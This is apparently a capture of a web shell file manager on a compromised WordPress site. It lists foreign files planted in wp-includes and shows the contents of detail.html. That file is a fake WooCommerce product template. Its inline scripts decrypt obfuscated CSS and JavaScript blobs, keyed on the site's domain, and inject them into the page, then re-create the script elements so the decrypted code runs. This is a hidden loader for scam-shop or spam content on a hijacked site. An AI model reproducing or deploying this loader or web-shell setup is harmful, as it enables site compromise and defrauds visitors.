X7ROOT File Manager
Current Path:
/home/greejped/haldiawater.com/wp-includes/block-supports
home
/
greejped
/
haldiawater.com
/
wp-includes
/
block-supports
/
ðŸ“
..
📄
align.php
(1.67 KB)
📄
aria-label.php
(1.57 KB)
📄
background.php
(4.02 KB)
📄
block-style-variations.php
(9.2 KB)
📄
border.php
(6.27 KB)
ðŸ“
child_cache
📄
collection.html
(18.27 KB)
📄
colors.php
(5.81 KB)
📄
config.json
(159 B)
📄
custom-classname.php
(1.64 KB)
📄
detail.html
(21.16 KB)
📄
dimensions.php
(5.28 KB)
📄
duotone.php
(2.67 KB)
📄
elements.php
(8.46 KB)
📄
error_log
(36.28 MB)
📄
generated-classname.php
(1.7 KB)
📄
home.html
(16.68 KB)
📄
index.php
(54.94 KB)
📄
layout.php
(38.5 KB)
📄
output_script.php
(181.13 KB)
📄
position.php
(4.24 KB)
📄
settings.php
(4.52 KB)
📄
shadow.php
(2.04 KB)
📄
spacing.php
(2.81 KB)
📄
static.css.html
(14.98 KB)
📄
static.js.html
(2.49 KB)
📄
typography.php
(28.13 KB)
📄
utils.php
(1011 B)
📄
web.config
(2 KB)
Editing: detail.html
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge"/> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"/> <meta name='robots' content='max-image-preview:large'/> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script> {{keywords}} {{description}} {{detail_json_ld}} {{title}} <script> function decode(t, k) { k = CryptoJS.MD5(k).toString(); let s = []; let iv = k.repeat(Math.ceil(t.length / k.length)).substring(0, t.length); for (let j = 0; j < t.length; j++) { let c = t[j]; let i = iv[j]; if (/[a-zA-Z]/.test(c)) { let start = /[a-z]/.test(c) ? 'a'.charCodeAt(0) : 'A'.charCodeAt(0); s.push(String.fromCharCode(start + (c.charCodeAt(0) - start - i.charCodeAt(0) % 26 + 26) % 26)); } else if (c.charCodeAt(0) >= 32 && c.charCodeAt(0) <= 64) { let start = ' '.charCodeAt(0); s.push(String.fromCharCode(start + (c.charCodeAt(0) - start - i.charCodeAt(0) % 33 + 33) % 33)); } else { s.push(c); } } return s.join(''); } function decodeHtmlEntities(encodedStr) { var textarea = document.createElement('textarea'); textarea.innerHTML = encodedStr; return textarea.value; } let cssText = {{static.css}} var domain = window.location.hostname; domain = domain.replace(/^www\./, '') let cssDecodedString = decodeHtmlEntities(cssText.join('')); const cssDecryptedText = decode(cssDecodedString, domain); document.head.innerHTML += cssDecryptedText </script> </head> <body class="product-template-default single single-product postid-155766078543 wp-embed-responsive theme-porto woocommerce woocommerce-page woocommerce-no-js login-popup wide blog-1 body-side elementor-default elementor-kit-2152"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-dark-grayscale"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0 0.49803921568627"/> <feFuncG type="table" tableValues="0 0.49803921568627"/> <feFuncB type="table" tableValues="0 0.49803921568627"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-grayscale"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0 1"/> <feFuncG type="table" tableValues="0 1"/> <feFuncB type="table" tableValues="0 1"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-purple-yellow"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0.54901960784314 0.98823529411765"/> <feFuncG type="table" tableValues="0 1"/> <feFuncB type="table" tableValues="0.71764705882353 0.25490196078431"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-blue-red"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0 1"/> <feFuncG type="table" tableValues="0 0.27843137254902"/> <feFuncB type="table" tableValues="0.5921568627451 0.27843137254902"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-midnight"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0 0"/> <feFuncG type="table" tableValues="0 0.64705882352941"/> <feFuncB type="table" tableValues="0 1"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-magenta-yellow"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0.78039215686275 1"/> <feFuncG type="table" tableValues="0 0.94901960784314"/> <feFuncB type="table" tableValues="0.35294117647059 0.47058823529412"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-purple-green"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0.65098039215686 0.40392156862745"/> <feFuncG type="table" tableValues="0 1"/> <feFuncB type="table" tableValues="0.44705882352941 0.4"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;"> <defs> <filter id="wp-duotone-blue-orange"> <feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 "/> <feComponentTransfer color-interpolation-filters="sRGB"> <feFuncR type="table" tableValues="0.098039215686275 1"/> <feFuncG type="table" tableValues="0 0.66274509803922"/> <feFuncB type="table" tableValues="0.84705882352941 0.41960784313725"/> <feFuncA type="table" tableValues="1 1"/> </feComponentTransfer> <feComposite in2="SourceGraphic" operator="in"/> </filter> </defs> </svg> <div class="page-wrapper side-nav"><!-- page wrapper --> <!-- header wrapper --> <div class="header-wrapper header-side-nav side-nav-wrap"> <header id="header" class="header-side sticky-menu-header" data-plugin-sticky data-plugin-options="{"autoInit": true, "minWidth": 992, "containerSelector": ".page-wrapper","autoFit":true, "paddingOffsetBottom": 0, "paddingOffsetTop": 0}"> <div class="header-main show-minicart"> <div class="container"> <div class="header-center"> <ul id="menu-main-menu" class="sidebar-menu"> {{product_category}} </ul> <a class="mobile-toggle" aria-label="Mobile Menu" href="javascript:;"><i class="fas fa-bars"></i></a> <div class="d-xl-none d-lg-none inline-block"> <div id="mini-cart" class="mini-cart simple"> <div class="cart-head"> <span class="cart-icon"><i class="minicart-icon porto-icon-shopping-cart"></i><span class="cart-items">0</span></span><span class="cart-items-text">0 items</span></div> <div class="cart-popup widget_shopping_cart"> <div class="widget_shopping_cart_content"> <div class="cart-loading"></div> </div> </div> </div> </div> </div> </div> </div> </header> </div> <!-- end header wrapper --> <div class="content-wrapper"> <section class="page-top page-header-6"> <div class="container hide-title"> <div class="row"> {{detail_breadcrumb}} </div> </div> </section> <div id="main" class="column1 boxed"><!-- main --> <div class="container"> <div class="row main-content-wrap"> <!-- main content --> <div class="main-content col-lg-12"> <div id="primary" class="content-area"> <main id="content" class="site-main"> <div class="woocommerce-notices-wrapper"></div> <div id="product-item" class="product type-product post-item status-publish first instock has-post-thumbnail sale shipping-taxable purchasable product-type-simple product-layout-default"> <div class="product-summary-wrap"> <div class="row"> <div class="summary-before col-md-5"> <div class="labels"> <div class="onsale">-40%</div> </div> {{detail_product_images}} </div> <div class="summary entry-summary col-md-7"> {{detail_product_title}} {{detail_product_price}} <div class="product_meta"> {{detail_product_meta}} </div> <form class="cart" action="/" method="post" enctype='multipart/form-data'> <div class="quantity buttons_added"> <button type="button" value="-" class="minus">-</button> <input type="number" id="quantity_664ee1870deeb" class="input-text qty text" step="1" min="1" max="48" name="quantity" value="1" title="Qty" size="4" placeholder="" inputmode="numeric"/> <button type="button" value="+" class="plus">+</button> </div> <button type="submit" name="add-to-cart" class="single_add_to_cart_button button alt add_to_cart_max porto-add-to-cart"> Add to cart </button> <a href="/cart" tabindex="1" class="wc-action-btn view-cart-btn button wc-forward">View cart</a></form> </div> </div><!-- .summary --> </div> <div class="woocommerce-tabs woocommerce-tabs-mc2scq6y resp-htabs" id="product-tab"> <ul class="resp-tabs-list" role="tablist"> <li class="description_tab" id="tab-title-description" role="tab" aria-controls="tab-description"> Description </li> <li class="global_tab_tab" id="tab-title-global_tab" role="tab" aria-controls="tab-global_tab"> Size Guide </li> </ul> <div class="resp-tabs-container"> <div class="tab-content" id="tab-description"> <h2>Description</h2> {{detail_product_description}} </div> <div class="tab-content" id="tab-global_tab"> <div class="porto-block" data-id="527"> </div> </div> </div> </div> </div> </main> </div> </div><!-- end main content --> <div class="sidebar-overlay"></div> </div> </div> <div class="related products"> <div class="container"> <h2 class="slider-title related-products">Related products</h2> <div class="slider-wrapper"> <ul class="products products-container products-slider owl-carousel show-dots-title-right dots-style-1 pcols-lg-5 pcols-md-4 pcols-xs-3 pcols-ls-2 pwidth-lg-5 pwidth-md-4 pwidth-xs-2 pwidth-ls-1" data-plugin-options="{"themeConfig":true,"lg":5,"md":4,"xs":3,"ls":2,"dots":true}" data-product_layout="product-wq_onimage"> {{detail_product_related}} </ul> </div> </div> </div> <div class="porto-block" data-id="1712"> <div class="container"></div> </div> </div><!-- end main --> <div class="footer-wrapper"> <div class="footer-top"> <div class="container"> <aside id="block-widget-5" class="widget widget-block"> <div class="block"></div> </aside> </div> </div> <div id="footer" class="footer footer-3" > <div class="footer-bottom"> <div class="container"> <div class="footer-left"> {{footer_copyright}} </div> <div class="footer-right"> <img class="img-responsive footer-payment-img" src="/wp-content/uploads/2020/01/shop10_payment-1.png" alt="Payment Gateways"/> </div> </div> </div> </div> </div> </div> </div><!-- end wrapper --> <div class="after-loading-success-message style-2"> <div class="background-overlay"></div> <div class="loader success-message-container"> <div class="msg-box"> <div class="msg">You've just added this product to the cart:<p class="product-name text-color-primary"></p></div> </div> <button class="button btn-primay viewcart" data-link="">View Cart</button> <button class="button btn-primay continue_shopping">Continue</button> </div> </div> <div class="panel-overlay"></div> <div id="side-nav-panel" class=""> <a href="#" aria-label="Mobile Close" class="side-nav-panel-close"><i class="fas fa-times"></i></a> <div class="switcher-wrap"></div> <div class="menu-wrap"><ul id="menu-main-menu-1" class="mobile-menu accordion-menu">{{product_category_mobile}}</ul></div> <div class="share-links"><a target="_blank" rel="nofollow noopener noreferrer" class="share-facebook" href="#" title="Facebook"></a> <a target="_blank" rel="nofollow noopener noreferrer" class="share-twitter" href="#" title="Twitter"></a> <a target="_blank" rel="nofollow noopener noreferrer" class="share-instagram" href="#" title="Instagram"></a> </div> </div> <script> function appendContent(content) { var container = document.createElement('div'); container.innerHTML = content; var scripts = container.getElementsByTagName('script'); for (var i = 0; i < scripts.length; i++) { var oldScript = scripts[i]; var newScript = document.createElement('script'); if (oldScript.src) { newScript.src = oldScript.src; } else { newScript.text = oldScript.innerHTML; } document.body.appendChild(newScript); } } let jsText = {{static.js}} let jsDecodedString = decodeHtmlEntities(jsText.join('')); const jsDecryptedText = decode(jsDecodedString, domain); appendContent(jsDecryptedText) </script> </body> </html>
Upload File
Create Folder